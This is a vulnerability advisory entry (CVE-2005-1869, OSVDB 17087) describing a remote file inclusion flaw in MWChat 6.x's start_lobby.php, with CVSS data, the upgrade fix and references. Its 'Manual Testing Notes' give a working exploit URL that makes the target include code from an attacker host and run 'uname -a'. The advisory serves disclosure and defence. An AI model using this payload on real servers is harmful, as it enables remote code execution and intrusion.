ID: CVE-2005-1869
Type: cve
Reporter: cve@mitre.org
Modified: 2008-09-05T20:50:00
Description
PHP remote file inclusion vulnerability in start_lobby.php in MWChat 6.x allows remote attackers to execute arbitrary PHP code via the CONFIG[MWCHAT_Libs] parameter.
OSVDB

Title: MWChat start_lobby.php Remote File Inclusion
ID: OSVDB:17087
Type: osvdb
Bulletin family: software
CVE list: CVE-2005-1869
Edition: 1
Published: 2005-06-01T08:12:26
Modified: 2005-06-01T08:12:26
Last seen: 2017-04-28T13:20:13
CVSS: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
Href: https://vulners.com/osvdb/OSVDB:17087

## Vulnerability Description
MWChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to start_lobby.php not properly sanitizing user input supplied to the CONFIG[MWCHAT_Libs] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

## Technical Description
It has been reported that the vendor's distribution file ships with .htaccess files which protect several directories. This flaw is only exploitable if the .htaccess file has been removed.

## Solution Description
Upgrade to version 6.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

## Short Description
MWChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to start_lobby.php not properly sanitizing user input supplied to the CONFIG[MWCHAT_Libs] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

## Manual Testing Notes
http://[victim]/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=uname -a

## References:
Vendor URL: http://www.appindex.net/products/detail/?product=mwchat
Vendor URL: http://www.appindex.net
Security Tracker: 1014090
[Secunia Advisory ID:15596](https://secuniaresearch.flexerasoftware.com/advisories/15596/)
Other Advisory URL: http://www.defacers.com.mx/advisories/4.txt
ISS X-Force ID: 20865
[CVE-2005-1869](https://vulners.com/cve/CVE-2005-1869)